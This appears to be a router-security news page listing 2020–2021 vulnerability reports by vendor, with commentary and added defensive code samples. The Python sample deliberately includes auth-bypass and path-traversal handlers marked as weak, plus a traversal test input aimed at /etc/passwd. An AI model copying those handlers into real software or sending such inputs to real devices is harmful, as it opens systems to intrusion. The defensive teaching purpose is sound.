Multiple Zyxel devices vulnerable to WAN side attack
Sophisticated hackers are targeting these Zyxel firewalls and VPNs
by Liam Tung of ZDNet June 25, 2021
Bad guys are hacking into these Zyxel devices: Unified Security Gateway (USG), ZyWALL, the USG FLEX combined firewall and VPN gateway, Advanced Threat Protection firewalls, and VPN series devices. They are modifying the devices to gain entry into the network behind them. The official Zyxel response makes it sound as if the bad guys are abusing back door accounts built into the devices. If so, it would not be the first time. Earlier this year, researchers found a backdoor account in Zyxel firmware, which left 100,000 devices vulnerable.
Microsoft toots their own horn - finds bug in 10 year old Netgear consumer router
Microsoft finds new NETGEAR firmware vulnerabilities that could lead to identity theft and full system compromise
by Jonathan Bar Or of Microsoft 365 Defender Research Team June 30, 2021
The buggy router, the NETGEAR DGN-2200 v1 series, is really a combination modem/router. And, it is old as heck, the User Guide is dated February 2011. Yet, here we are, in June 2021 and Microsoft announces that they found bugs in it. This is really a PR stunt for Microsoft defensive software. That said, their software was triggered by "... a device owned by a non-IT personnel was trying to access a NETGEAR DGN-2200v1 router’s management port." Great catch, but who is using a 10 year old DSL modem/router and the latest and greatest Microsoft software? The router is as buggy as buggy gets. Any remote person can get full control of it. The worst bug lets you access any page in the web admin if you include one of the get-out-of-jail-free character strings in the GET request. Another bug exploits the encryption of the configuration backup file to learn the userid/password to login legitimately. The bugs are described in enough detail to make someone not trust Netgear. The bugs have been fixed, which is quite a trick. You have to assume this router was End-of-Life years ago.
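Three of the web-server weaknesses on this page share one root: the server decides what a request is allowed to do by looking at the raw request string. The Netgear DGN-2200 skipped login when the request contained a magic substring; muhttpd (Arris, above) and the Arcadyan firmware let ".." walk out of the web root. This added example, which is not code from any of those vendors, shows the weak patterns next to the canonicalise-then-allowlist approach; the web root, public-file list and magic strings are constructed.

```python
import posixpath
from urllib.parse import unquote

# Constructed router web UI layout for this example (not any vendor's).
WEB_ROOT = "/www"
# Files a not-yet-logged-in browser may fetch: the login page and its assets.
PUBLIC_FILES = frozenset({"/login.html", "/style.css", "/logo.gif", "/favicon.ico"})
# Constructed stand-ins for the "get-out-of-jail-free" strings.
MAGIC_SUBSTRINGS = (".gif", ".jpg", ".css")


def _raw_path(request_target: str) -> str:
    """Origin-form request target minus the query string."""
    return request_target.split("?", 1)[0]


def vulnerable_exempt_from_auth(request_target: str) -> bool:
    """Weak pattern: if the request target contains a 'static asset' string
    anywhere, skip the login check. '/admin.html?x=.gif' therefore passes."""
    return any(m in request_target for m in MAGIC_SUBSTRINGS)


def vulnerable_resolve_file(request_target: str, web_root: str = WEB_ROOT) -> str:
    """Weak pattern: decode and glue onto the web root with no containment
    check, so '..' components walk out of the root."""
    return posixpath.normpath(web_root + unquote(_raw_path(request_target)))


def canonical_path(request_target: str):
    """Decode exactly once, refuse anything still ambiguous, then normalise.
    Returns the clean absolute path, or None when the request must be refused."""
    path = unquote(_raw_path(request_target))
    if not path.startswith("/") or "\x00" in path or "\\" in path:
        return None
    if "%" in path:                      # double-encoded (%252e...) or malformed
        return None
    if ".." in path.split("/"):          # refuse traversal outright, never "fix" it
        return None
    clean = posixpath.normpath(path)     # collapses '//' inside and '/./'
    if clean.startswith("//"):           # normpath keeps two leading slashes
        clean = "/" + clean.lstrip("/")
    return clean


def hardened_exempt_from_auth(request_target: str) -> bool:
    """Exact match of the canonical path against the public allowlist; the
    query string and any decoding tricks no longer influence the decision."""
    clean = canonical_path(request_target)
    return clean is not None and clean in PUBLIC_FILES


def resolve_file(request_target: str, web_root: str = WEB_ROOT):
    """Map a request onto the filesystem and check the result is inside root."""
    clean = canonical_path(request_target)
    if clean is None:
        return None
    full = posixpath.normpath(web_root + clean)
    if full != web_root and not full.startswith(web_root + "/"):
        return None                      # belt and braces: escaped the root
    return full


if __name__ == "__main__":
    for target in ("/logo.gif", "/admin.html?x=.gif", "/%2e%2e/etc/passwd"):
        print(target, vulnerable_exempt_from_auth(target),
              hardened_exempt_from_auth(target),
              vulnerable_resolve_file(target), resolve_file(target))
```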
MAY 2021
Wi-Fi bugs in most every Wi-Fi device
Frag Attack
by Mathy Vanhoef of NYU May 10, 2021
Shame on everyone for these Frag Attack bugs. Some of the Wi-Fi bugs are in the official specs for how Wi-Fi is supposed to work. For that, shame on the Wi-Fi Alliance, a group that has previously shown itself not to be up to the job. The rest of the bugs fall on many assorted programmers for not programming to the specs. Not just the programmers working for one company, but for many companies.
Why so much shame? It is very likely that every Wi-Fi device in the world has at least one of the 12 bugs. Quoting Vanhoef: "In experiments on more than 75 devices, all of them were vulnerable to one or more of the discovered attacks." Bug fixes are needed from dozens, if not hundreds, of sources. We'll get some, over time, but these bugs are sure to last for decades. The design flaws are difficult to exploit according to Vanhoef: "... the biggest concern are the programming mistakes in Wi-Fi products since several of them are trivial to exploit." One defense is HTTPS. A VPN helps with some of the bugs, but not all. Quoting: "Using a VPN can prevent attacks where an adversary is trying to exfiltrate data. It will not prevent an adversary from bypassing your router's NAT/firewall to directly attack devices." Interestingly, Wi-Fi 6 (aka ax) is more vulnerable than Wi-Fi 5 (aka ac). Vanhoef has worked with the Wi-Fi Alliance for the last nine months to get these bugs fixed. To date, five companies have released patches. Vanhoef gets in a dig at the Wi-Fi Alliance when he says "...it's essential to regularly test Wi-Fi products for security vulnerabilities, which can for instance be done when certifying them." The Wi-Fi Alliance does this certification. We may be in good hands with Allstate, but that is not the case with the Wi-Fi Alliance. He also says the biggest risk is likely the ability to abuse these flaws to attack devices in someone's home network. He does not offer a defense, but I will - VLANs, or, at the least, Guest Wi-Fi networks. Or, a second router. The bug that scares me the most is the one that allows bad guys to bypass a router firewall and attack devices directly. He tested four consumer routers and found two were vulnerable, but he did not name names and did not say which of the 12 bugs they were vulnerable to. Check with your router vendor to see if they have anything to say about this.
Likewise, fixes are needed for Access Points and operating systems.
How bad is this really? From the horse's mouth:
Does this mean every Wi-Fi device is trivial to attack?
"The design issues are, on their own, tedious to exploit in practice. Unfortunately, some of the implementation vulnerabilities are common and trivial to exploit. Additionally, by combining the design issues with certain implementation issues, the resulting attacks become more serious. This means the impact of our findings depends on the specific target. Your vendor can inform you what the precise impact is for specific devices. In other words, for some devices the impact is minor, while for others it's disastrous."
Still more bugs in Cisco RV34X routers
Advisory: Cisco RV34X Series – Privilege Escalation in vpnTimer
by T. Shiomitsu of the IoT Inspector Research Lab May 5, 2021
"A few weeks ago, we published an advisory on the Cisco RV series routers, where we outlined the root cause for authentication bypass and remote command execution issues.
This week, Cisco has released an advisory for another bug we reported around the same time: A privilege escalation issue, which could be used in combination with the other two issues to run arbitrary code with root privileges on affected RV34X devices." The bug is CVE-2021-1520 - Privilege Escalation in vpnTimer. A look at old firmware shows that the bug has been present since at least the first firmware update package of the RV34X series back in February 2017. Vulnerable routers are the RV340, RV340W, RV345 and the RV345P. A fix is available.
APRIL 2021
Bugs in Cisco RV34X series routers
Advisory: Cisco RV34X Series – Authentication Bypass and Remote Command Execution
by T. Shiomitsu of the IoT Inspector Research Lab April 13, 2021
"In early 2021, we reported a few security issues to Cisco related to their RV34X series of routers, two of which have been recently patched. The issues in question were an authentication bypass and system command injection, both in the web management interface. These can be chained together to achieve unauthenticated command execution." Cisco took 4 months to release a fix (Jan 2, 2021 through April 7, 2021) and they admit that other devices are also affected. The bugs are CVE-2021-1472 - RV34X /upload Authorization Bypass Vulnerability and CVE-2021-1473 - RV34X OS Command injection in Cookie string.
Critical bug in Juniper Junos OS - fixes available
Critical Vulnerability Can Allow Attackers to Hijack or Disrupt Juniper Devices
by Eduard Kovacs of Security Week April 16, 2021
A buffer size validation flaw may allow an unauthenticated remote attacker to send specially crafted packets to a vulnerable device, triggering a partial Denial of Service, or remote code execution. An attacker who successfully exploits the vulnerability can gain root access to the targeted system. The bug is in the overlayd daemon which runs as root by default and listens for UDP connections on port 4789. The underlying problem is improper buffer size validation, which can lead to a buffer overflow. The bug is CVE-2021-0254. Good news: Fixes are available and vulnerable devices are typically not exposed to the Internet. The bug was discovered by Nguyễn Hoàng Thạch with Singapore-based cybersecurity company STAR Labs.
MARCH 2021
Bug in D-Link DIR-3060 router
Advisory: D-Link DIR-3060 Authenticated RCE (CVE-2021-28144)
by IoT Inspector Research Lab March 11, 2021
The D-Link DIR-3060 is affected by a post-authentication command injection vulnerability. Anybody with authenticated access to the router can run arbitrary system commands on the device as the system admin user, with root privileges. D-Link has released a patched firmware.
Bugs in Cisco RV132W and RV134W routers
CVE-2021-1287 Detail
by NIST March 17, 2021
"A vulnerability in the web-based management interface of Cisco RV132W ADSL2+ Wireless-N VPN Routers and Cisco RV134W VDSL2 Wireless-AC VPN Routers could allow an authenticated, remote attacker to execute arbitrary code on an affected device or cause the device to restart unexpectedly. The vulnerability exists because the web-based management interface does not properly validate user-supplied input.... A successful exploit could allow the attacker to execute arbitrary code as the root user .... " The attacker needs to be authenticated to the device before they can exploit the flaw. Fixes are available.
FEBRUARY 2021
Still more Cisco bugs
Cisco Warns of Critical Auth-Bypass Security Flaw
by Lindsey O'Donnell of Threatpost
February 25, 2021
"A critical vulnerability in Cisco Systems' intersite policy manager software could allow a remote attacker to bypass authentication. The vulnerability is one of three critical flaws fixed by Cisco this week. It exists in Cisco’s ACI Multi-Site Orchestrator (ACI MSO) — this is Cisco’s management software for businesses ... The flaw stems from improper token validation on an API endpoint in Cisco’s ACI MSO. The vulnerability ranks 10 (out of 10) on the CVSS vulnerability-rating scale. The glitch is considered critical because an attacker - without any authentication - could remotely exploit it..." Cisco also fixed a bug in their NX-OS network operating system for Nexus-series Ethernet switches. This flaw, which has a CVSS score of 9.8 out of 10, lets an unauthenticated, remote attacker create, delete or overwrite arbitrary files with root privileges on Cisco Nexus 3000 Series Switches and Cisco Nexus 9000 Series Switches.
Paying more does not get you better software
Fortinet fixes critical vulnerabilities in SSL VPN and web firewall
by Ax Sharma of Bleeping Computer February 7, 2021
There are assorted bugs in the FortiProxy SSL VPN and FortiWeb Web Application Firewall (WAF) products. The worst bug is in the FortiProxy SSL VPN; it can be triggered by a remote, unauthenticated attacker using a specially crafted POST request. A SQL Injection flaw (CVE-2020-29015) lets an attacker get the hash of the administrator account due to excessive DBMS user privileges. A Buffer Overflow flaw (CVE-2020-29016) allows for arbitrary code execution by a remote attacker without the password.
JANUARY 2021
SonicWall hacked using a bug in their own software
SonicWall firewall maker hacked using zero-day in its VPN device
by Lawrence Abrams of Bleeping Computer January 23, 2021
"SonicWall is a well-known manufacturer of hardware firewall devices, VPN gateways, and network security solutions whose products are commonly used in SMB/SME and large enterprise organizations." They released an advisory warning that hackers used a bug in their Secure Mobile Access (SMA) VPN device and their NetExtender VPN client to attack their internal systems.
Until the bug is fixed they suggest enabling two-factor authentication and blocking web traffic from countries that do not need to access their devices. Then:
SonicWall SMA 100 zero-day exploit actively used in the wild
by Lawrence Abrams February 1, 2021
SonicWall is still investigating the vulnerability and has not provided many details. It likely affects their SMA 100 series of remote access appliances. Another suggested mitigation is restricting the IP addresses that can access the SonicWall management interface. Then:
SonicWall fixes actively exploited SMA 100 zero-day vulnerability
By Lawrence Abrams February 3, 2021
They released a patch for the bug in the SMA 100 series of appliances running firmware version 10.x. Specifically: the SMA 200, SMA 210, SMA 400, SMA 410 and the virtual SMA 500v appliance. They have still not provided any details on the vulnerability. Tweets from the NCC Group indicate that it allows remote access to the management interface without authorization.
And ... still MORE Cisco bugs
Cisco reveals critical bug in small biz VPN routers when half the world is stuck working at home
by Simon Sharwood of The Register February 5, 2021
This is as bad as bad gets. The worst bugs "can be exploited by an unauthenticated, remote attacker to execute arbitrary code as the root user. All the attacker needs to do is send a maliciously crafted HTTP request to the web-based management interface." Routers vulnerable to this are: RV160, RV160W, RV260, RV260P, and RV260W. Other bugs allow a remote bad guy, again without a password, to "conduct directory traversal attacks and overwrite certain files that should be restricted ...." Other Cisco routers, the RV016, RV042, RV042G, RV082, RV320, and RV325 have still other bugs. All the bugs seem to be due to lazy Cisco employees who can't be bothered to validate input. Four buggy routers, the RV016, RV042, RV042G, and RV082 are not getting updates because they are too old. If the bugs don't turn you away from Cisco, consider the tech support experience - they put most of the burden on you. These quotes are from the bug Advisories below.
You want the patches? "... customers may only download software for which they have a valid license, procured from Cisco directly, or through a Cisco authorized reseller or partner."
You want to learn about available updates? Cisco won't tell you. "When considering software upgrades, customers are advised to regularly consult the advisories for Cisco products, which are available from the Cisco Security Advisories page, to determine exposure..." Will the available update work on your hardware? You figure it out. "In all cases, customers should ensure that the devices to be upgraded contain sufficient memory and confirm that current hardware and software configurations will continue to be supported properly by the new release." I don't even know what the last part of that quote means. The big point is that you pump your own gas when you are a Cisco customer. I would not use their hardware for a paper weight.
More Cisco bugs
High-Severity Cisco Flaw Found in CMX Software For Retailers
by Lindsey O'Donnell of ThreatPost January 13, 2021
At this point, I would not trust or even want to touch any hardware or software from Cisco. Their software has too many bugs and this case shows their refusal to fix some bugs. Cisco addressed 67 high-severity bugs. That is far too many to have in software that is reasonably mature. Far too many. Sixty of the bugs exist in the web-based management interface of Cisco Small Business RV110W, RV130, RV130W and RV215W routers. Quoting: "Of note, Cisco said it would not release software updates for the Cisco Small Business RV110W, RV130, RV130W and RV215W routers, as they have reached end of life."
DECEMBER 2020
Bugs bugs bugs bugs bugs bugs
Vulnerability Summary for the Week of December 28, 2020 Bulletin (SB21-004)
by the CISA branch of the US Government January 4, 2021
A summary of new vulnerabilities that have been recorded in the past week. Again, just one week. Below is a summary of the CISA summary for assorted devices from networking companies. They may not all be routers and the severity of the bugs varies widely.
---------
Tenda AC1200 (Model AC6) the default settings for the router speed test contain links to download malware CVE-2020-28094
Tenda AC1200 (Model AC6) a large HTTP POST request sent to the change password API will trigger the router to crash and enter an infinite boot loop. CVE-2020-28095
Tenda N300 F3 devices allow remote attackers to obtain sensitive information via a direct request for cgi-bin/DownloadCfg/RouterCfm.cfg CVE-2020-35391
Tenda AC1200 (Model AC6) userids: admin, support, user, and nobody have a password of 1234. CVE-2020-28093
---------
Belkin LINKSYS RE6500 allow remote attackers to execute arbitrary commands or set a new password via shell metacharacters CVE-2020-35713
Belkin LINKSYS RE6500 allow remote attackers to cause a persistent denial of service (segmentation fault) CVE-2020-35716
Belkin LINKSYS RE6500 allow remote authenticated users to execute arbitrary commands via shell metacharacters in a filename CVE-2020-35715 and CVE-2020-35714
---------
TP-Link: a password-disclosure issue in the web interface of certain TP-Link devices allows a remote attacker to get full administrative access to the web panel. CVE-2020-35575
---------
Certain Zyxel products allow command injection by an admin via an input string to chg_exp_pwd during a password-change action. CVE-2020-29299
------------
DrayTek Vigor2960 allows remote command execution via shell metacharacters in a toLogin2FA action to mainfunction.cgi. CVE-2020-19664
-------------
Certain NETGEAR devices are affected by disclosure of sensitive information. CVE-2020-35802
Certain NETGEAR devices are affected by a buffer overflow by an authenticated user. CVE-2020-35787
Certain NETGEAR devices are affected by command injection by an authenticated user. CVE-2020-35793
NETGEAR DGN2200v1 devices mishandle HTTPd authentication CVE-2020-35785
NETGEAR GS716Tv3 and GS724Tv4 are affected by CSRF. CVE-2020-35778
NETGEAR JGS516PE , JGS524PE, JGS524Ev2 and GS116Ev2 are affected by lack of access control at the function level. CVE-2020-35784
NETGEAR JGS516PE, JGS524Ev2, JGS524PE and GS116Ev2 are affected by incorrect configuration of security settings. CVE-2020-35801
NETGEAR NMS300 devices are affected by command injection by an authenticated user. CVE-2020-35789
NETGEAR NMS300 devices are affected by denial of service. CVE-2020-35780 and CVE-2020-35781
NETGEAR R7500v2, R8900, R9000 and R7800 are affected by command injection by an authenticated user. CVE-2020-35792 and CVE-2020-35791
NETGEAR RBS40V, RBK752, RBR750, RBS750, RBK852, RBR850 and RBS850 are affected by command injection by an authenticated user. CVE-2020-35794
NETGEAR WAC104 devices are affected by a buffer overflow by an authenticated user. CVE-2020-35788
NETGEAR D6200, D7000, JNR1010v2, JR6150, JWNR2010v5, R6020, R6050, R6080, R6120, R6220, R6260, WNR1000v4, WNR2020 and WNR2050 are affected by stored XSS. CVE-2020-35840 and CVE-2020-35842
NETGEAR R7800 is affected by a buffer overflow by an authenticated user. CVE-2020-35786
NETGEAR D7800, R7500v2, R7800, R8900, R9000, RAX120, RBK50, RBR50, RBS50, XR500 and XR700 are affected by stored XSS. CVE-2020-35824 and CVE-2020-35830 and CVE-2020-35835
NETGEAR D7800, R7800, R8900, R9000 and XR700 are affected by disclosure of sensitive information. CVE-2020-35804 and CVE-2020-35838 and CVE-2020-35837
NETGEAR R6400v2, R6700v3, R6900P, R7000, R7000P, R7800, R7850, R7900, R7960P, R8000, R7900P, R8000P, RAX15, RAX20, RAX200, RAX45, RAX50, RAX75, RAX80, RBK752, RBR750, RBS750, RBK852, RBR850, RBS850, RBK842, RBR840, RBS840, RS400 and XR300 are affected by command injection by an unauthenticated attacker. CVE-2020-35798
---------
Just ... one ... week.
Critical bug in D-Link DSR VPN routers
D-Link VPN routers get patch for remote command injection bugs
by Ionut Ilascu of Bleeping Computer December 8, 2020
No one makes money saying that newly discovered bugs are not that big a deal. So, this trio of D-Link bugs may or may not be a big deal, despite the fact that everyone says the sky is falling. To be clear, the most critical of the three bugs is indeed the worst possible type of flaw - anyone on the Internet can totally hack these routers. What is not said, however, is whether the web interface to these routers is exposed to the Internet by default. If not, this is much less of an issue. I suspect the web interface is not available remotely because if it was, the company that found these bugs would say so. Either way, D-Link should say something about this in their response, but, they do not. They don't care about security. Further proof about how little D-Link cares about security is the timeline. Three bugs were reported to them on August 11, 2020. Their first response was early December 2020. They fixed two of the bugs and consider the third not a real problem. The most critical bug can also be exploited on the LAN but VLANs can be used to limit access to the web based Admin interface. At least on good routers they can. I don't know if these routers support VLANs. The bugs affect the DSR-150, DSR-250, DSR-500 and DSR-1000.
NOVEMBER 2020
Avoid routers from Jetstream and Wavlink
Walmart-exclusive router and others sold on Amazon and eBay contain hidden backdoors to control devices
by Bernard Meyer of CyberNews.com November 23, 2020
This expands on a problem first noticed in April 2020. Quoting: "In a collaboration between CyberNews Sr. Information Security Researcher Mantas Sasnauskas and researchers James Clee and Roni Carta, suspicious backdoors have been discovered in a Chinese-made Jetstream router, sold exclusively at Walmart as their new line of 'affordable' wifi routers. This backdoor would allow an attacker the ability to remotely control not only the routers, but also any devices connected to that network ... the cybersecurity research team also discovered that low-cost Wavlink routers, normally sold on Amazon or eBay, have similar backdoors. The Wavlink routers also contain a script that lists nearby wifi and has the capability to connect to those networks ... While Jetstream has an exclusive deal with Walmart, and is sold under other brand names like Ematic, there is very little information available about which Chinese company actually produces these products ... While Clee's original research (and follow-up) analyzed one Wavlink router, our new analysis shows that multiple Wavlink and Jetstream devices have now been shown to be affected. In fact, all of the devices that the team analyzed were found to contain backdoors."
Routers from Asus and TP-Link hacked at a hacking contest
Routers, NAS Devices, TVs Hacked at Pwn2Own Tokyo 2020
by Eduard Kovacs of Security Week November 9, 2020
Update: Dec 17, 2020: I am tracking the acknowledgment and/or fix for the Asus router on the News page. So far, nothing.
Update Nov 13, 2020: It appears that one of these articles was wrong. The Netgear router was not hacked. Also, the TP-Link router is not sold in the US.
The three routers that were reportedly hacked at the contest are the ASUS RT-AX86U, the TP-Link TL-WDR7660 and the NETGEAR Nighthawk R7800. Two bugs were found in the Netgear router. The bugs will be disclosed to the hardware manufacturers and hopefully fixes will be released. What no one will say is whether the same bugs exist in other routers from these companies.
OCTOBER 2020
The second critical flaw for SonicWall this year
800,000 SonicWall VPNs vulnerable to new remote code execution bug
by Catalin Cimpanu of ZDNet October 15, 2020
SonicWall Network Security Appliances are used as firewalls and SSL VPN portals to control access to internal and private networks. The Tripwire VERT security team discovered a bug that exists in almost 800,000 internet-accessible SonicWall VPN appliances. The bug is considered critical and is expected to come under active exploitation once proof-of-concept code is made publicly available. The underlying problem is a stack-based buffer overflow. To exploit the bug, bad guys do not need to have valid credentials. Oh, and the bug is trivial to exploit, even for unskilled attackers. This is SonicWall's second major bug this year. Patches are available.
JULY 2020
Asus router bug and insight into Asus itself
ASUS Router Vulnerable to Fake Updates and XSS
by Martin Rakhmanov of Trustwave July 23, 2020
Rakhmanov found two bugs in the ASUS RT-AC1900P router and the company has fixed them. One bug (CVE-2020-15498) was that the firmware update process accepted software with forged server certificates. This would have let spies and hackers install their own firmware on their router. An attacker would have to be adjacent network-wise to the router to perform this man in the middle attack, but it could result in a full compromise of the router. The other bug (CVE-2020-15499) was an XSS in a dialog window of the admin interface. There are two things here that are very important, much more so than the bugs themselves. Neither ASUS nor Rakhmanov said anything about other ASUS routers. It is very likely they too are vulnerable, but it is none of our business. Then too, there is the way Asus handled this. For one thing they never issued a security advisory. And, as we see below in the Revision History, they could not be bothered to tell Rakhmanov when they fixed the bug. And, when he asked they were not sure if they fixed one or both bugs.
Multiple D-Link router bugs
5 severe D-Link router vulnerabilities disclosed, patch now
By Ax Sharma of Bleeping computer July 24, 2020
It is not clear from this story which routers are buggy. The research the story is based on is for a router that is End-of-Life (no more bug fixes, it's too darn old to bother with).
The bugs are in the web interface to the router, as they often are. Best practice for router security is always to limit LAN side access to the router's admin interface, and, of course, to disable remote administration. I found one bug quite noteworthy. It lets a bad guy bypass the router password by adding a couple of parameters to the HTTP request to the router. The same flaw was reported in 2010 and again in 2011. That tells you all you need to know about D-Link.
Way too many bugs in Cisco software
Cisco releases security fixes for critical VPN, router vulnerabilities
by Charlie Osborne for ZDNet July 17, 2020
For the most part, I leave out Cisco bugs from this page because there are just too many of them. The number of critical bugs in Cisco software over the years has been far too high. I would not use their products. Cisco just released fixes for 34 bugs, five of which are the most critical in that they allow bad guys to get total control of vulnerable devices. One issue is the Telnet service in the Small Business RV110W Wireless-N VPN Firewall router. It has a default, static password that, if obtained by attackers, can lead to the full remote hijacking of a device. This is a mistake that can not be forgiven and not the first time Cisco has had hard coded passwords. A flaw in the management interface of the Cisco Small Business RV110W, RV130, RV130W, and RV215W routers can be exploited to execute arbitrary code as the root user. This is a very common flaw, improper validation of input. Translation: lazy programmers. Same thing with the web interface of the Cisco RV110W VPN Firewall and RV215W VPN router.
Do not buy a router from Tenda
Tenda AC15 AC1900 Vulnerabilities Discovered and Exploited
by Sanjana Sarda of Independent Security Evaluators July 10, 2020
Their research uncovered five bugs including two methods attackers can use to gain persistent unauthenticated root access to the router. They also found 7 open LAN side ports. Much of this article is focused on the specifics of the bugs and it leaves out the implications. Are the bugs exploitable LAN side or WAN side or both? Does a user have to be logged in to exploit the bug or not? Despite this, the article is very useful at the end. ISE first contacted Tenda in January 2020. Here, six months later, no response from Tenda at all. And, as always with router bugs, it is likely that similar flaws exist in other firmware versions and other Tenda routers.
JUNE 2020
79 Netgear devices are buggy and the company did nothing
SOHO Device Exploitation
by Adam of Grimm June 15, 2020
Quoting: "This is just one more example of how SOHO device security has fallen behind as compared to other modern software ... As such, it’s trivial to overflow the stack buffer." The author found a pre-authentication stack overflow vulnerability in the Netgear R7000 router running firmware version 1.0.9.88. The vulnerability, which allows for remote code execution, has been present in the R7000 since it was released in 2013. But that is only the beginning. Adam was able to identify 79 different Netgear devices and 758 Netgear firmware images that included the buggy code. The oldest buggy firmware dated back to 2007. The vulnerability was reported to Netgear on May 7, 2020 and they seemed to have ignored it. Using assorted scripts, Adam created an exploit for each of the 758 buggy firmware images. Then, he tested his exploit on 28 of the vulnerable devices to ensure that it worked as expected. Among the confirmed buggy routers are the Netgear R6250, R6300v2, R6400, R7000, R8000, R8300 and the R8500. Criticizing Netgear he said "In addition to lacking stack cookies, the web server is also not compiled as a Position-independent Executable (PIE), and thus cannot take full advantage of ASLR. As such, it’s trivial to find a ROP gadget within the httpd binary ... that will call system with a command taken from the overflown stack."
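The two mitigations the quote says the Netgear web server was built without, stack cookies and PIE, are things anyone examining firmware can check for themselves. This is a script I added for that, not code from Grimm's write-up or from Netgear; it assumes GNU binutils (readelf) is installed on the analysis machine and that the binary has been extracted from the firmware image already:

```shell
#!/bin/sh
# Added example, my own and not from Grimm's write-up: check an ELF binary
# extracted from a firmware image (an httpd, say) for the two mitigations the
# write-up says the Netgear web server was built without: stack protector
# ("stack cookies") and position independence (PIE, needed for full ASLR).
# Assumes GNU binutils (readelf) is installed on the analysis machine.

# Takes the text of "readelf -h FILE". A PIE is reported with Type DYN (the
# same type a shared library has); a fixed-address executable shows EXEC.
is_pie_from_header() {
    printf '%s\n' "$1" | grep -q '^[[:space:]]*Type:[[:space:]]*DYN'
}

# Takes the text of "readelf -s FILE". A binary compiled with -fstack-protector
# calls __stack_chk_fail when a canary is corrupted, so the symbol appears in
# its symbol table (as an undefined import for a dynamically linked binary).
has_stack_protector_from_symbols() {
    printf '%s\n' "$1" | grep -q '__stack_chk_fail'
}

# hardening_report FILE: one line per mitigation; exit status 0 only when both
# are present, so it can gate a firmware-review script.
hardening_report() {
    bin="$1"
    hdr=$(readelf -h "$bin") || return 2
    syms=$(readelf -s "$bin") || return 2
    missing=0
    if is_pie_from_header "$hdr"; then
        echo "PIE:             yes"
    else
        echo "PIE:             no   (code is loaded at a fixed address; ASLR cannot hide it)"
        missing=1
    fi
    if has_stack_protector_from_symbols "$syms"; then
        echo "stack protector: yes"
    else
        echo "stack protector: no   (no canary between stack buffers and the return address)"
        missing=1
    fi
    return $missing
}
```

Run it as `hardening_report ./squashfs-root/usr/sbin/httpd` (path is an assumption). Two caveats: DYN also describes shared libraries, so only apply the PIE test to executables, and a statically linked, stripped binary can use the stack protector without exporting the symbol, so a "no" there is a reason to look closer rather than a final answer.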
Bugs in a very old D-Link router
D-Link leaves severe security bugs in home router unpatched
by Ionut Ilascu of Bleeping Computer June 12, 2020
The D-Link DIR-865L router was released in 2012 and is no longer supported for U.S. consumers. However, on the website for European countries, the status is "End of Sale" which means that it can no longer be purchased but it is still supported by the vendor. Researchers at Palo Alto Networks' Unit 42 found and reported six security vulnerabilities in the DIR-865L in late February 2020. Now, over three months later, D-Link released beta firmware that fixes three of the six flaws. Two bigger issues: 1) What about other models? Unit 42 warned that newer routers may be vulnerable to the same flaws because they share a common code base. A good router vendor will check for the same flaw in all their products. A bad router vendor will not. The response from D-Link said nothing about any other models. 2) Who cares about such an old router? Why is Unit 42 even looking at ancient consumer devices? In the US, the DIR-865L went out of support in Feb. 2016.
APRIL 2020
Wavlink does not respond to security flaws - another brand to avoid
Multiple Vulnerabilities in Wavlink Router leads to Unauthenticated Remote Code Execution
by James Clee April 18, 2020
Clee started a new hobby - buying cheap Chinese technology to see what he could find out about security. He started with the Wavlink WL-WN530HG4 which sells for $30.
An interesting read that resulted in CVE-2020-10971 and CVE-2020-10972. He found back doors and miserable password verifications. Quoting: "... so an attacker with the right background information about the device could achieve RCE fairly easily." Worse, he attempted multiple times to contact Wavlink using several different support contacts and they ignored him. This is not a company you want to deal with.
A few days later he wrote about the Wavlink WL-WN579G3 and WL-WN579A3 Wi-Fi Extenders. They were just as bad as the router. He found that lots of web pages are externally accessible without authentication and they contain sensitive data. He could get the username and password without authenticating to the devices. Once again, Wavlink did not respond to any of his attempts at communication.
Sophos quickly issues patch for their firewalls
Hackers are exploiting a Sophos firewall zero-day
by Catalin Cimpanu for ZDNet April 26, 2020
Bad guys were found to be attacking a previously unknown SQL injection vulnerability in the Sophos XG enterprise firewall. Sophos learned about the problem on April 22nd when a customer reported something strange. They published an emergency security update on April 25th. The firewalls can self-update, though I doubt every user has that enabled. No surprise to learn that vulnerable firewalls had either their administration or User Portal control panel exposed to the Internet. The bug let bad guys steal files from the XG firewall, and those files could include usernames and hashed passwords for the firewall administrator, for the firewall portal admins and for user accounts used for remote access to the device. Bad guys could also learn the firewall's license and serial number, and see some user emails. Sophos researchers named the malware Asnarok.
From what I have seen, the Sophos response was great. You could not ask for more. Not only did they fix the bug quickly, they also documented the heck out of the issue.
MARCH 2020
Multiple issues with OpenWRT
Uncovering OpenWRT remote code execution (CVE-2020-7982)
by Guido Vranken of ForAllSecure March 24, 2020
The OpenWRT package manager, opkg, does not check the SHA256 hash of anything it downloads. This is compounded by it downloading updates over HTTP rather than HTTPS. In addition, the opkg unpacker is buggy; malformed data leads to a variety of memory violations. opkg on OpenWrt runs as root with write access to the entire filesystem, so arbitrary code could be injected by means of forged .ipk packages with malicious payloads. Also vulnerable is the LEDE fork of OpenWRT. One of the bugs was introduced in February 2017. Fixes are available.
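The missing check is easy to describe: compare the SHA-256 of what was downloaded with the value the repository's index says it should have, and refuse to install on a mismatch. Below is a script I added to show that check, not opkg's own code or anything from the OpenWrt project. It assumes the Packages index has a "SHA256sum:" line in each package stanza, as OpenWrt's does, and that sha256sum (coreutils) or shasum is installed:

```shell
#!/bin/sh
# Added example, not OpenWrt's or opkg's own code: check a downloaded .ipk
# against the SHA256sum recorded in the repository's Packages index before
# handing it to opkg. Assumes sha256sum (coreutils) or shasum is installed.

# Print the SHA256sum field for one package from a Packages index read on
# stdin. The index is a series of stanzas separated by blank lines, each with
# "Package:", "Version:", "Filename:" and "SHA256sum:" lines (assumed to match
# the OpenWrt index layout).
expected_sha256() {
    awk -v pkg="$1" '
        /^Package: /   { cur = $2 }
        /^SHA256sum: / && cur == pkg { print $2; exit }
    '
}

# Hex SHA-256 of a file, using whichever tool is available.
file_sha256() {
    if command -v sha256sum >/dev/null 2>&1; then
        sha256sum "$1" | awk '{ print $1 }'
    else
        shasum -a 256 "$1" | awk '{ print $1 }'
    fi
}

# verify_package <Packages index file> <package name> <downloaded .ipk>
# Exit status 0 when the hashes match, 1 on a mismatch or a missing entry.
verify_package() {
    index="$1"; pkg="$2"; ipk="$3"
    want=$(expected_sha256 "$pkg" < "$index")
    [ -n "$want" ] || { echo "no SHA256sum for $pkg in index" >&2; return 1; }
    got=$(file_sha256 "$ipk")
    if [ "$got" = "$want" ]; then
        echo "OK: $ipk matches index ($got)"
        return 0
    fi
    echo "MISMATCH: $ipk has $got, index says $want" >&2
    return 1
}
```

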